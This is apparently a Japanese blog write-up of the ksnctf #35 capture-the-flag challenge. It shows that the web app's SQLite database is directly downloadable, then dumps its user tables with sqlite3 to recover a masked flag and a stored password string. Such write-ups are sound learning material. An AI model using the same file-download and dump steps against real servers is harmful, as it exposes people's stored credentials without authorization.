ksnctf #35 Simple Auth II
ksnctf #35 Simple Auth II
September 17, 2017
問題
解き方
ソースコードが見れるので確認する。
PHPのソースコードはよくわからないが、以下のような記載があった。
$db = new PDO('sqlite:database.db');
DBの場所が記載されているので、URLから直接ダウンロードしてみる。
ttp://ctfq.sweetduet.info:10080/~q35/database.db
DBの中身を確認
SQLiteのDBのようなので接続してみる。
# Macの場合
~ ❯❯❯ sqlite3 Downloads/database.db ⏎
SQLite version 3.16.0 2016-11-04 19:09:39
Enter ".help" for usage hints.
sqlite> .tables
user user2
sqlite> select * from user;
root|FLAG_*****************←ここにFLAG
sqlite> select * from user2;
root|GLDmNFJimveAAxyg_wSNp
sqlite>
その他
SQLインジェクションの問題だと思ったら違った。